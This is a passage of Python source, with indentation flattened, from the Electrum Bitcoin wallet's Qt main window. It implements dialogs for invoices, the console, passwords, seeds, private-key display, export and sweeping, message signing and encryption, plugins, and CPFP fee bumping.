outputs_str = '\n'.join(map(lambda x: self.format_amount(x[2]) + ' ' + self.base_unit() + ' @ ' + x[1], pr.get_outputs()))
grid.addWidget(QLabel(outputs_str), 1, 1)
expires = pr.get_expiration_date()
grid.addWidget(QLabel(_("Memo") + ':'), 2, 0)
grid.addWidget(QLabel(pr.get_memo()), 2, 1)
grid.addWidget(QLabel(_("Signature") + ':'), 3, 0)
grid.addWidget(QLabel(pr.get_verify_status()), 3, 1)
if expires:
grid.addWidget(QLabel(_("Expires") + ':'), 4, 0)
grid.addWidget(QLabel(format_time(expires)), 4, 1)
vbox.addLayout(grid)
def do_export():
name = str(key) + '.bip70'
fn = self.getSaveFileName(_("Save invoice to file"), name, filter="*.bip70")
if not fn:
return
with open(fn, 'wb') as f:
f.write(pr.raw)
self.show_message(_('Invoice saved as') + ' ' + fn)
exportButton = EnterButton(_('Save'), do_export)
def do_delete():
if self.question(_('Delete invoice?')):
self.wallet.delete_invoices(key)
self.history_list.update()
self.invoice_list.update()
d.close()
deleteButton = EnterButton(_('Delete'), do_delete)
vbox.addLayout(Buttons(exportButton, deleteButton, CloseButton(d)))
d.exec_()
def pay_bip70_invoice(self, key):
pr = self.wallet.get_invoice(key)
self.payment_request = pr
self.prepare_for_payment_request()
pr.error = None # this forces verify() to re-run
if pr.verify(self.contacts):
self.payment_request_ok()
else:
self.payment_request_error()
def create_console_tab(self):
from .console import Console
self.console = console = Console()
return console
def update_console(self):
console = self.console
console.history = self.wallet.storage.get("qt-console-history", [])
console.history_index = len(console.history)
console.updateNamespace({
'wallet': self.wallet,
'network': self.network,
'plugins': self.gui_object.plugins,
'window': self,
'config': self.config,
'electrum': electrum,
'daemon': self.gui_object.daemon,
'util': util,
'bitcoin': bitcoin,
})
c = commands.Commands(config=self.config,
network=self.network,
callback=lambda: self.console.set_json(True))
methods = {}
def mkfunc(f, method):
return lambda *args, **kwargs: f(method,
args,
self.password_dialog,
**{**kwargs, 'wallet': self.wallet})
for m in dir(c):
if m[0]=='_' or m in ['network','wallet','config']: continue
methods[m] = mkfunc(c._run, m)
console.updateNamespace(methods)
def create_status_bar(self):
sb = QStatusBar()
sb.setFixedHeight(35)
self.balance_label = QLabel("Loading wallet...")
self.balance_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
self.balance_label.setStyleSheet("""QLabel { padding: 0 }""")
sb.addWidget(self.balance_label)
self.search_box = QLineEdit()
self.search_box.textChanged.connect(self.do_search)
self.search_box.hide()
sb.addPermanentWidget(self.search_box)
self.update_check_button = QPushButton("")
self.update_check_button.setFlat(True)
self.update_check_button.setCursor(QCursor(Qt.PointingHandCursor))
self.update_check_button.setIcon(read_QIcon("update.png"))
self.update_check_button.hide()
sb.addPermanentWidget(self.update_check_button)
self.password_button = StatusBarButton(QIcon(), _("Password"), self.change_password_dialog )
sb.addPermanentWidget(self.password_button)
sb.addPermanentWidget(StatusBarButton(read_QIcon("preferences.png"), _("Preferences"), self.settings_dialog ) )
self.seed_button = StatusBarButton(read_QIcon("seed.png"), _("Seed"), self.show_seed_dialog )
sb.addPermanentWidget(self.seed_button)
self.status_button = StatusBarButton(read_QIcon("status_disconnected.png"), _("Network"), lambda: self.gui_object.show_network_dialog(self))
sb.addPermanentWidget(self.status_button)
run_hook('create_status_bar', sb)
self.setStatusBar(sb)
def create_coincontrol_statusbar(self):
self.coincontrol_sb = sb = QStatusBar()
sb.setSizeGripEnabled(False)
#sb.setFixedHeight(3 * char_width_in_lineedit())
sb.setStyleSheet('QStatusBar::item {border: None;} '
+ ColorScheme.GREEN.as_stylesheet(True))
self.coincontrol_label = QLabel()
self.coincontrol_label.setSizePolicy(QSizePolicy.Preferred, QSizePolicy.Preferred)
self.coincontrol_label.setTextInteractionFlags(Qt.TextSelectableByMouse)
sb.addWidget(self.coincontrol_label)
clear_cc_button = EnterButton(_('Reset'), lambda: self.utxo_list.set_spend_list([]))
clear_cc_button.setStyleSheet("margin-right: 5px;")
sb.addPermanentWidget(clear_cc_button)
sb.setVisible(False)
return sb
def set_coincontrol_msg(self, msg: Optional[str]) -> None:
if not msg:
self.coincontrol_label.setText("")
self.coincontrol_sb.setVisible(False)
return
self.coincontrol_label.setText(msg)
self.coincontrol_sb.setVisible(True)
def update_lock_icon(self):
icon = read_QIcon("lock.png") if self.wallet.has_password() else read_QIcon("unlock.png")
self.password_button.setIcon(icon)
def update_buttons_on_seed(self):
self.seed_button.setVisible(self.wallet.has_seed())
self.password_button.setVisible(self.wallet.may_have_password())
self.send_button.setVisible(not self.wallet.is_watching_only())
def change_password_dialog(self):
from electrum.storage import StorageEncryptionVersion
if self.wallet.get_available_storage_encryption_version() == StorageEncryptionVersion.XPUB_PASSWORD:
from .password_dialog import ChangePasswordDialogForHW
d = ChangePasswordDialogForHW(self, self.wallet)
ok, encrypt_file = d.run()
if not ok:
return
try:
hw_dev_pw = self.wallet.keystore.get_password_for_storage_encryption()
except UserCancelled:
return
except BaseException as e:
self.logger.exception('')
self.show_error(repr(e))
return
old_password = hw_dev_pw if self.wallet.has_password() else None
new_password = hw_dev_pw if encrypt_file else None
else:
from .password_dialog import ChangePasswordDialogForSW
d = ChangePasswordDialogForSW(self, self.wallet)
ok, old_password, new_password, encrypt_file = d.run()
if not ok:
return
try:
self.wallet.update_password(old_password, new_password, encrypt_file)
except InvalidPassword as e:
self.show_error(str(e))
return
except BaseException:
self.logger.exception('Failed to update password')
self.show_error(_('Failed to update password'))
return
msg = _('Password was updated successfully') if self.wallet.has_password() else _('Password is disabled, this wallet is not protected')
self.show_message(msg, title=_("Success"))
self.update_lock_icon()
def toggle_search(self):
self.search_box.setHidden(not self.search_box.isHidden())
if not self.search_box.isHidden():
self.search_box.setFocus(1)
else:
self.do_search('')
def do_search(self, t):
tab = self.tabs.currentWidget()
if hasattr(tab, 'searchable_list'):
tab.searchable_list.filter(t)
def new_contact_dialog(self):
d = WindowModalDialog(self, _("New Contact"))
vbox = QVBoxLayout(d)
vbox.addWidget(QLabel(_('New Contact') + ':'))
grid = QGridLayout()
line1 = QLineEdit()
line1.setFixedWidth(32 * char_width_in_lineedit())
line2 = QLineEdit()
line2.setFixedWidth(32 * char_width_in_lineedit())
grid.addWidget(QLabel(_("Address")), 1, 0)
grid.addWidget(line1, 1, 1)
grid.addWidget(QLabel(_("Name")), 2, 0)
grid.addWidget(line2, 2, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if d.exec_():
self.set_contact(line2.text(), line1.text())
def show_wallet_info(self):
dialog = WindowModalDialog(self, _("Wallet Information"))
dialog.setMinimumSize(500, 100)
mpk_list = self.wallet.get_master_public_keys()
vbox = QVBoxLayout()
wallet_type = self.wallet.get_wallet_label()
if self.wallet.is_watching_only():
wallet_type += ' [{}]'.format(_('watching-only'))
seed_available = _('True') if self.wallet.has_seed() else _('False')
keystore_types = [k.get_type_text() for k in self.wallet.get_keystores()]
grid = QGridLayout()
basename = os.path.basename(self.wallet.storage.path)
grid.addWidget(QLabel(_("Wallet name")+ ':'), 0, 0)
grid.addWidget(QLabel(basename), 0, 1)
grid.addWidget(QLabel(_("Wallet type")+ ':'), 1, 0)
grid.addWidget(QLabel(wallet_type), 1, 1)
grid.addWidget(QLabel(_("Script type")+ ':'), 2, 0)
grid.addWidget(QLabel(self.wallet.txin_type), 2, 1)
grid.addWidget(QLabel(_("Seed available") + ':'), 3, 0)
grid.addWidget(QLabel(str(seed_available)), 3, 1)
if len(keystore_types) <= 1:
grid.addWidget(QLabel(_("Keystore type") + ':'), 4, 0)
ks_type = str(keystore_types[0]) if keystore_types else _('No keystore')
grid.addWidget(QLabel(ks_type), 4, 1)
vbox.addLayout(grid)
if self.wallet.is_deterministic():
mpk_text = ShowQRTextEdit()
mpk_text.setMaximumHeight(150)
mpk_text.addCopyButton(self.app)
def show_mpk(index):
mpk_text.setText(mpk_list[index])
mpk_text.repaint() # macOS hack for #4777
# only show the combobox in case multiple accounts are available
if len(mpk_list) > 1:
# only show the combobox if multiple master keys are defined
def label(idx, ks):
if isinstance(self.wallet, Multisig_Wallet) and hasattr(ks, 'label'):
return _("cosigner") + f' {idx+1}: {ks.get_type_text()} {ks.label}'
else:
return _("keystore") + f' {idx+1}'
labels = [label(idx, ks) for idx, ks in enumerate(self.wallet.get_keystores())]
on_click = lambda clayout: show_mpk(clayout.selected_index())
labels_clayout = ChoicesLayout(_("Master Public Keys"), labels, on_click)
vbox.addLayout(labels_clayout.layout())
else:
vbox.addWidget(QLabel(_("Master Public Key")))
show_mpk(0)
vbox.addWidget(mpk_text)
vbox.addStretch(1)
btns = run_hook('wallet_info_buttons', self, dialog) or Buttons(CloseButton(dialog))
vbox.addLayout(btns)
dialog.setLayout(vbox)
dialog.exec_()
def remove_wallet(self):
if self.question('\n'.join([
_('Delete wallet file?'),
"%s"%self.wallet.storage.path,
_('If your wallet contains funds, make sure you have saved its seed.')])):
self._delete_wallet()
@protected
def _delete_wallet(self, password):
wallet_path = self.wallet.storage.path
basename = os.path.basename(wallet_path)
r = self.gui_object.daemon.delete_wallet(wallet_path)
if r:
self.show_error(_("Wallet removed: {name}").format(name=basename))
else:
self.show_error(_("Wallet file not found: {name}").format(name=basename))
self.close()
@protected
def show_seed_dialog(self, password):
if not self.wallet.has_seed():
self.show_message(_('This wallet has no seed'))
return
keystore = self.wallet.get_keystore()
try:
seed = keystore.get_seed(password)
passphrase = keystore.get_passphrase(password)
except BaseException as e:
self.show_error(repr(e))
return
from .seed_dialog import SeedDialog
d = SeedDialog(self, seed, passphrase)
d.exec_()
def show_qrcode(self, data, title = _("QR code"), parent=None):
if not data:
return
d = QRDialog(data, parent or self, title)
d.exec_()
@protected
def show_private_key(self, address, password):
if not address:
return
try:
pk = self.wallet.export_private_key(address, password)
except Exception as e:
self.logger.exception('')
self.show_message(repr(e))
return
xtype = bitcoin.deserialize_privkey(pk)[0]
d = WindowModalDialog(self, _("Private key"))
d.setMinimumSize(600, 150)
vbox = QVBoxLayout()
vbox.addWidget(QLabel(_("Address") + ': ' + address))
vbox.addWidget(QLabel(_("Script type") + ': ' + xtype))
vbox.addWidget(QLabel(_("Private key") + ':'))
keys_e = ShowQRTextEdit(text=pk)
keys_e.addCopyButton(self.app)
vbox.addWidget(keys_e)
# if redeem_script:
# vbox.addWidget(QLabel(_("Redeem Script") + ':'))
# rds_e = ShowQRTextEdit(text=redeem_script)
# rds_e.addCopyButton(self.app)
# vbox.addWidget(rds_e)
vbox.addLayout(Buttons(CloseButton(d)))
d.setLayout(vbox)
d.exec_()
msg_sign = _("Signing with an address actually means signing with the corresponding "
"private key, and verifying with the corresponding public key. The "
"address you have entered does not have a unique public key, so these "
"operations cannot be performed.") + '\n\n' + \
_('The operation is undefined. Not just in Electrum, but in general.')
@protected
def do_sign(self, address, message, signature, password):
address = address.text().strip()
message = message.toPlainText().strip()
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
if not self.wallet.is_mine(address):
self.show_message(_('Address not in wallet.'))
return
txin_type = self.wallet.get_txin_type(address)
if txin_type not in ['p2pkh', 'p2wpkh', 'p2wpkh-p2sh']:
self.show_message(_('Cannot sign messages with this type of address:') + \
' ' + txin_type + '\n\n' + self.msg_sign)
return
task = partial(self.wallet.sign_message, address, message, password)
def show_signed_message(sig):
try:
signature.setText(base64.b64encode(sig).decode('ascii'))
except RuntimeError:
# (signature) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=show_signed_message)
def do_verify(self, address, message, signature):
address = address.text().strip()
message = message.toPlainText().strip().encode('utf-8')
if not bitcoin.is_address(address):
self.show_message(_('Invalid Bitcoin address.'))
return
try:
# This can throw on invalid base64
sig = base64.b64decode(str(signature.toPlainText()))
verified = ecc.verify_message_with_address(address, sig, message)
except Exception as e:
verified = False
if verified:
self.show_message(_("Signature verified"))
else:
self.show_error(_("Wrong signature"))
def sign_verify_message(self, address=''):
d = WindowModalDialog(self, _('Sign/verify Message'))
d.setMinimumSize(610, 290)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
address_e = QLineEdit()
address_e.setText(address)
layout.addWidget(QLabel(_('Address')), 2, 0)
layout.addWidget(address_e, 2, 1)
signature_e = QTextEdit()
signature_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Signature')), 3, 0)
layout.addWidget(signature_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Sign"))
b.clicked.connect(lambda: self.do_sign(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Verify"))
b.clicked.connect(lambda: self.do_verify(address_e, message_e, signature_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
@protected
def do_decrypt(self, message_e, pubkey_e, encrypted_e, password):
if self.wallet.is_watching_only():
self.show_message(_('This is a watching-only wallet.'))
return
cyphertext = encrypted_e.toPlainText()
task = partial(self.wallet.decrypt_message, pubkey_e.text(), cyphertext, password)
def setText(text):
try:
message_e.setText(text.decode('utf-8'))
except RuntimeError:
# (message_e) wrapped C/C++ object has been deleted
pass
self.wallet.thread.add(task, on_success=setText)
def do_encrypt(self, message_e, pubkey_e, encrypted_e):
message = message_e.toPlainText()
message = message.encode('utf-8')
try:
public_key = ecc.ECPubkey(bfh(pubkey_e.text()))
except BaseException as e:
self.logger.exception('Invalid Public key')
self.show_warning(_('Invalid Public key'))
return
encrypted = public_key.encrypt_message(message)
encrypted_e.setText(encrypted.decode('ascii'))
def encrypt_message(self, address=''):
d = WindowModalDialog(self, _('Encrypt/decrypt Message'))
d.setMinimumSize(610, 490)
layout = QGridLayout(d)
message_e = QTextEdit()
message_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Message')), 1, 0)
layout.addWidget(message_e, 1, 1)
layout.setRowStretch(2,3)
pubkey_e = QLineEdit()
if address:
pubkey = self.wallet.get_public_key(address)
pubkey_e.setText(pubkey)
layout.addWidget(QLabel(_('Public key')), 2, 0)
layout.addWidget(pubkey_e, 2, 1)
encrypted_e = QTextEdit()
encrypted_e.setAcceptRichText(False)
layout.addWidget(QLabel(_('Encrypted')), 3, 0)
layout.addWidget(encrypted_e, 3, 1)
layout.setRowStretch(3,1)
hbox = QHBoxLayout()
b = QPushButton(_("Encrypt"))
b.clicked.connect(lambda: self.do_encrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Decrypt"))
b.clicked.connect(lambda: self.do_decrypt(message_e, pubkey_e, encrypted_e))
hbox.addWidget(b)
b = QPushButton(_("Close"))
b.clicked.connect(d.accept)
hbox.addWidget(b)
layout.addLayout(hbox, 4, 1)
d.exec_()
def password_dialog(self, msg=None, parent=None):
from .password_dialog import PasswordDialog
parent = parent or self
d = PasswordDialog(parent, msg)
return d.run()
def tx_from_text(self, data: Union[str, bytes]) -> Union[None, 'PartialTransaction', 'Transaction']:
from electrum.transaction import tx_from_any
try:
return tx_from_any(data)
except BaseException as e:
self.show_critical(_("Electrum was unable to parse your transaction") + ":\n" + repr(e))
return
def read_tx_from_qrcode(self):
from electrum import qrscanner
try:
data = qrscanner.scan_barcode(self.config.get_video_device())
except BaseException as e:
self.show_error(repr(e))
return
if not data:
return
# if the user scanned a bitcoin URI
if str(data).startswith("bitcoin:"):
self.pay_to_URI(data)
return
# else if the user scanned an offline signed tx
tx = self.tx_from_text(data)
if not tx:
return
self.show_transaction(tx)
def read_tx_from_file(self) -> Optional[Transaction]:
fileName = self.getOpenFileName(_("Select your transaction file"),
TRANSACTION_FILE_EXTENSION_FILTER)
if not fileName:
return
try:
with open(fileName, "rb") as f:
file_content = f.read() # type: Union[str, bytes]
except (ValueError, IOError, os.error) as reason:
self.show_critical(_("Electrum was unable to open your transaction file") + "\n" + str(reason),
title=_("Unable to read file or no transaction found"))
return
return self.tx_from_text(file_content)
def do_process_from_text(self):
text = text_dialog(self, _('Input raw transaction'), _("Transaction:"), _("Load transaction"))
if not text:
return
tx = self.tx_from_text(text)
if tx:
self.show_transaction(tx)
def do_process_from_file(self):
tx = self.read_tx_from_file()
if tx:
self.show_transaction(tx)
def do_process_from_txid(self):
from electrum import transaction
txid, ok = QInputDialog.getText(self, _('Lookup transaction'), _('Transaction ID') + ':')
if ok and txid:
txid = str(txid).strip()
try:
raw_tx = self.network.run_from_another_thread(
self.network.get_transaction(txid, timeout=10))
except Exception as e:
self.show_message(_("Error getting transaction from network") + ":\n" + repr(e))
return
tx = transaction.Transaction(raw_tx)
self.show_transaction(tx)
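# export_privkeys_dialog() decrypts keys on a worker thread so the dialog
# stays responsive: privkeys_thread() emits computing_privkeys_signal as a
# per-address progress tick and show_privkeys_signal when done, while the
# `done`/`cancelled` flags let a closed dialog stop the thread early.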
@protected
def export_privkeys_dialog(self, password):
if self.wallet.is_watching_only():
self.show_message(_("This is a watching-only wallet"))
return
if isinstance(self.wallet, Multisig_Wallet):
self.show_message(_('WARNING: This is a multi-signature wallet.') + '\n' +
_('It cannot be "backed up" by simply exporting these private keys.'))
d = WindowModalDialog(self, _('Private keys'))
d.setMinimumSize(980, 300)
vbox = QVBoxLayout(d)
msg = "%s\n%s\n%s" % (_("WARNING: ALL your private keys are secret."),
_("Exposing a single private key can compromise your entire wallet!"),
_("In particular, DO NOT use 'redeem private key' services proposed by third parties."))
vbox.addWidget(QLabel(msg))
e = QTextEdit()
e.setReadOnly(True)
vbox.addWidget(e)
defaultname = 'electrum-private-keys.csv'
select_msg = _('Select file to export your private keys to')
hbox, filename_e, csv_button = filename_field(self, self.config, defaultname, select_msg)
vbox.addLayout(hbox)
b = OkButton(d, _('Export'))
b.setEnabled(False)
vbox.addLayout(Buttons(CancelButton(d), b))
private_keys = {}
addresses = self.wallet.get_addresses()
done = False
cancelled = False
def privkeys_thread():
for addr in addresses:
time.sleep(0.1)
if done or cancelled:
break
privkey = self.wallet.export_private_key(addr, password)
private_keys[addr] = privkey
self.computing_privkeys_signal.emit()
if not cancelled:
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.emit()
def show_privkeys():
s = "\n".join( map( lambda x: x[0] + "\t"+ x[1], private_keys.items()))
e.setText(s)
b.setEnabled(True)
self.show_privkeys_signal.disconnect()
nonlocal done
done = True
def on_dialog_closed(*args):
nonlocal done
nonlocal cancelled
if not done:
cancelled = True
self.computing_privkeys_signal.disconnect()
self.show_privkeys_signal.disconnect()
self.computing_privkeys_signal.connect(lambda: e.setText("Please wait... %d/%d"%(len(private_keys),len(addresses))))
self.show_privkeys_signal.connect(show_privkeys)
d.finished.connect(on_dialog_closed)
threading.Thread(target=privkeys_thread).start()
if not d.exec_():
done = True
return
filename = filename_e.text()
if not filename:
return
try:
self.do_export_privkeys(filename, private_keys, csv_button.isChecked())
except (IOError, os.error) as reason:
txt = "\n".join([
_("Electrum was unable to produce a private key-export."),
str(reason)
])
self.show_critical(txt, title=_("Unable to create csv"))
except Exception as e:
self.show_message(repr(e))
return
self.show_message(_("Private keys exported."))
def do_export_privkeys(self, fileName, pklist, is_csv):
with open(fileName, "w+") as f:
if is_csv:
transaction = csv.writer(f)
transaction.writerow(["address", "private_key"])
for addr, pk in pklist.items():
transaction.writerow(["%34s"%addr,pk])
else:
f.write(json.dumps(pklist, indent = 4))
def do_import_labels(self):
def import_labels(path):
def _validate(data):
return data # TODO
def import_labels_assign(data):
for key, value in data.items():
self.wallet.set_label(key, value)
import_meta(path, _validate, import_labels_assign)
def on_import():
self.need_update.set()
import_meta_gui(self, _('labels'), import_labels, on_import)
def do_export_labels(self):
def export_labels(filename):
export_meta(self.wallet.labels, filename)
export_meta_gui(self, _('labels'), export_labels)
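# sweep_key_dialog() collects WIF private keys, validates them and a
# destination address as the user types (the Sweep button stays disabled
# until both are valid), then builds a single '!' (send-max) output and
# hands the external keypairs to the regular pay_onchain_dialog() flow.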
def sweep_key_dialog(self):
d = WindowModalDialog(self, title=_('Sweep private keys'))
d.setMinimumSize(600, 300)
vbox = QVBoxLayout(d)
hbox_top = QHBoxLayout()
hbox_top.addWidget(QLabel(_("Enter private keys:")))
hbox_top.addWidget(InfoButton(get_wif_help_text()), alignment=Qt.AlignRight)
vbox.addLayout(hbox_top)
keys_e = ScanQRTextEdit(allow_multi=True)
keys_e.setTabChangesFocus(True)
vbox.addWidget(keys_e)
addresses = self.wallet.get_unused_addresses()
if not addresses:
try:
addresses = self.wallet.get_receiving_addresses()
except AttributeError:
addresses = self.wallet.get_addresses()
h, address_e = address_field(addresses)
vbox.addLayout(h)
vbox.addStretch(1)
button = OkButton(d, _('Sweep'))
vbox.addLayout(Buttons(CancelButton(d), button))
button.setEnabled(False)
def get_address():
addr = str(address_e.text()).strip()
if bitcoin.is_address(addr):
return addr
def get_pk(*, raise_on_error=False):
text = str(keys_e.toPlainText())
return keystore.get_private_keys(text, raise_on_error=raise_on_error)
def on_edit():
valid_privkeys = False
try:
valid_privkeys = get_pk(raise_on_error=True) is not None
except Exception as e:
button.setToolTip(f'{_("Error")}: {repr(e)}')
else:
button.setToolTip('')
button.setEnabled(get_address() is not None and valid_privkeys)
on_address = lambda text: address_e.setStyleSheet((ColorScheme.DEFAULT if get_address() else ColorScheme.RED).as_stylesheet())
keys_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_edit)
address_e.textChanged.connect(on_address)
on_address(str(address_e.text()))
if not d.exec_():
return
# user pressed "sweep"
addr = get_address()
try:
self.wallet.check_address(addr)
except InternalAddressCorruption as e:
self.show_error(str(e))
raise
try:
coins, keypairs = sweep_preparations(get_pk(), self.network)
except Exception as e: # FIXME too broad...
self.show_message(repr(e))
return
scriptpubkey = bfh(bitcoin.address_to_script(addr))
outputs = [PartialTxOutput(scriptpubkey=scriptpubkey, value='!')]
self.warn_if_watching_only()
self.pay_onchain_dialog(coins, outputs, invoice=None, external_keypairs=keypairs)
def _do_import(self, title, header_layout, func):
text = text_dialog(self, title, header_layout, _('Import'), allow_multi=True)
if not text:
return
keys = str(text).split()
good_inputs, bad_inputs = func(keys)
if good_inputs:
msg = '\n'.join(good_inputs[:10])
if len(good_inputs) > 10: msg += '\n...'
self.show_message(_("The following addresses were added")
+ f' ({len(good_inputs)}):\n' + msg)
if bad_inputs:
msg = "\n".join(f"{key[:10]}... ({msg})" for key, msg in bad_inputs[:10])
if len(bad_inputs) > 10: msg += '\n...'
self.show_error(_("The following inputs could not be imported")
+ f' ({len(bad_inputs)}):\n' + msg)
self.address_list.update()
self.history_list.update()
def import_addresses(self):
if not self.wallet.can_import_address():
return
title, msg = _('Import addresses'), _("Enter addresses")+':'
self._do_import(title, msg, self.wallet.import_addresses)
@protected
def do_import_privkey(self, password):
if not self.wallet.can_import_privkey():
return
title = _('Import private keys')
header_layout = QHBoxLayout()
header_layout.addWidget(QLabel(_("Enter private keys")+':'))
header_layout.addWidget(InfoButton(get_wif_help_text()), alignment=Qt.AlignRight)
self._do_import(title, header_layout, lambda x: self.wallet.import_private_keys(x, password))
def update_fiat(self):
b = self.fx and self.fx.is_enabled()
self.fiat_send_e.setVisible(b)
self.fiat_receive_e.setVisible(b)
self.history_list.update()
self.address_list.refresh_headers()
self.address_list.update()
self.update_status()
def settings_dialog(self):
from .settings_dialog import SettingsDialog
d = SettingsDialog(self, self.config)
self.alias_received_signal.connect(d.set_alias_color)
d.exec_()
self.alias_received_signal.disconnect(d.set_alias_color)
if self.fx:
self.fx.trigger_update()
run_hook('close_settings_dialog')
if d.need_restart:
self.show_warning(_('Please restart Electrum to activate the new GUI settings'), title=_('Success'))
def closeEvent(self, event):
# It seems in some rare cases this closeEvent() is called twice
if not self.cleaned_up:
self.cleaned_up = True
self.clean_up()
event.accept()
def clean_up(self):
self.wallet.thread.stop()
if self.network:
self.network.unregister_callback(self.on_network)
self.config.set_key("is_maximized", self.isMaximized())
if not self.isMaximized():
g = self.geometry()
self.wallet.storage.put("winpos-qt", [g.left(),g.top(),
g.width(),g.height()])
self.wallet.storage.put("qt-console-history", self.console.history[-50:])
if self.qr_window:
self.qr_window.close()
self.close_wallet()
self.gui_object.timer.timeout.disconnect(self.timer_actions)
self.gui_object.close_window(self)
def plugins_dialog(self):
self.pluginsdialog = d = WindowModalDialog(self, _('Electrum Plugins'))
plugins = self.gui_object.plugins
vbox = QVBoxLayout(d)
# plugins
scroll = QScrollArea()
scroll.setEnabled(True)
scroll.setWidgetResizable(True)
scroll.setMinimumSize(400,250)
vbox.addWidget(scroll)
w = QWidget()
scroll.setWidget(w)
w.setMinimumHeight(plugins.count() * 35)
grid = QGridLayout()
grid.setColumnStretch(0,1)
w.setLayout(grid)
settings_widgets = {}
def enable_settings_widget(p, name, i):
widget = settings_widgets.get(name)
if not widget and p and p.requires_settings():
widget = settings_widgets[name] = p.settings_widget(d)
grid.addWidget(widget, i, 1)
if widget:
widget.setEnabled(bool(p and p.is_enabled()))
def do_toggle(cb, name, i):
p = plugins.toggle(name)
cb.setChecked(bool(p))
enable_settings_widget(p, name, i)
run_hook('init_qt', self.gui_object)
for i, descr in enumerate(plugins.descriptions.values()):
full_name = descr['__name__']
prefix, _separator, name = full_name.rpartition('.')
p = plugins.get(name)
if descr.get('registers_keystore'):
continue
try:
cb = QCheckBox(descr['fullname'])
plugin_is_loaded = p is not None
cb_enabled = (not plugin_is_loaded and plugins.is_available(name, self.wallet)
or plugin_is_loaded and p.can_user_disable())
cb.setEnabled(cb_enabled)
cb.setChecked(plugin_is_loaded and p.is_enabled())
grid.addWidget(cb, i, 0)
enable_settings_widget(p, name, i)
cb.clicked.connect(partial(do_toggle, cb, name, i))
msg = descr['description']
if descr.get('requires'):
msg += '\n\n' + _('Requires') + ':\n' + '\n'.join(map(lambda x: x[1], descr.get('requires')))
grid.addWidget(HelpButton(msg), i, 2)
except Exception:
self.logger.exception(f"cannot display plugin {name}")
grid.setRowStretch(len(plugins.descriptions.values()), 1)
vbox.addLayout(Buttons(CloseButton(d)))
d.exec_()
def cpfp(self, parent_tx: Transaction, new_tx: PartialTransaction) -> None:
total_size = parent_tx.estimated_size() + new_tx.estimated_size()
parent_txid = parent_tx.txid()
assert parent_txid
parent_fee = self.wallet.get_tx_fee(parent_txid)
if parent_fee is None:
self.show_error(_("Can't CPFP: unknown fee for parent transaction."))
return
d = WindowModalDialog(self, _('Child Pays for Parent'))
vbox = QVBoxLayout(d)
msg = (
"A CPFP is a transaction that sends an unconfirmed output back to "
"yourself, with a high fee. The goal is to have miners confirm "
"the parent transaction in order to get the fee attached to the "
"child transaction.")
vbox.addWidget(WWLabel(_(msg)))
msg2 = ("The proposed fee is computed using your "
"fee/kB settings, applied to the total size of both child and "
"parent transactions. After you broadcast a CPFP transaction, "
"it is normal to see a new unconfirmed transaction in your history.")
vbox.addWidget(WWLabel(_(msg2)))
grid = QGridLayout()
grid.addWidget(QLabel(_('Total size') + ':'), 0, 0)
grid.addWidget(QLabel('%d bytes'% total_size), 0, 1)
max_fee = new_tx.output_value()
grid.addWidget(QLabel(_('Input amount') + ':'), 1, 0)
grid.addWidget(QLabel(self.format_amount(max_fee) + ' ' + self.base_unit()), 1, 1)
output_amount = QLabel('')
grid.addWidget(QLabel(_('Output amount') + ':'), 2, 0)
grid.addWidget(output_amount, 2, 1)
fee_e = BTCAmountEdit(self.get_decimal_point)
# FIXME with dyn fees, without estimates, there are all kinds of crashes here
combined_fee = QLabel('')
combined_feerate = QLabel('')
def on_fee_edit(x):
out_amt = max_fee - fee_e.get_amount()
out_amt_str = (self.format_amount(out_amt) + ' ' + self.base_unit()) if out_amt else ''
output_amount.setText(out_amt_str)
comb_fee = parent_fee + fee_e.get_amount()
comb_fee_str = (self.format_amount(comb_fee) + ' ' + self.base_unit()) if comb_fee else ''
combined_fee.setText(comb_fee_str)
comb_feerate = comb_fee / total_size * 1000
comb_feerate_str = self.format_fee_rate(comb_feerate) if comb_feerate else ''
combined_feerate.setText(comb_feerate_str)
fee_e.textChanged.connect(on_fee_edit)
def get_child_fee_from_total_feerate(fee_per_kb):
fee = fee_per_kb * total_size / 1000 - parent_fee
fee = min(max_fee, fee)
fee = max(total_size, fee) # pay at least 1 sat/byte for combined size
return fee
suggested_feerate = self.config.fee_per_kb()
if suggested_feerate is None:
            self.show_error(f'''{_("Can't CPFP")}: {_('Dynamic fee estimates not available')}''')
return
fee = get_child_fee_from_total_feerate(suggested_feerate)
fee_e.setAmount(fee)
grid.addWidget(QLabel(_('Fee for child') + ':'), 3, 0)
grid.addWidget(fee_e, 3, 1)
def on_rate(dyn, pos, fee_rate):
fee = get_child_fee_from_total_feerate(fee_rate)
fee_e.setAmount(fee)
fee_slider = FeeSlider(self, self.config, on_rate)
fee_slider.update()
grid.addWidget(fee_slider, 4, 1)
grid.addWidget(QLabel(_('Total fee') + ':'), 5, 0)
grid.addWidget(combined_fee, 5, 1)
grid.addWidget(QLabel(_('Total feerate') + ':'), 6, 0)
grid.addWidget(combined_feerate, 6, 1)
vbox.addLayout(grid)
vbox.addLayout(Buttons(CancelButton(d), OkButton(d)))
if not d.exec_():
return
fee = fee_e.get_amount()
if fee > max_fee:
self.show_error(_('Max fee exceeded'))
return
new_tx = self.wallet.cpfp(parent_tx, fee)
new_tx.set_rbf(True)
self.show_transaction(new_tx)
def bump_fee_dialog(self, tx: Transaction):
txid = tx.txid()
assert txid
fee = self.wallet.get_tx_fee(txid)
if fee is None:
self.show_error(_("Can't bump fee: unknown fee for original transaction."))
return
tx_label = self.wallet.get_label(txid)
tx_size = tx.estimated_size()
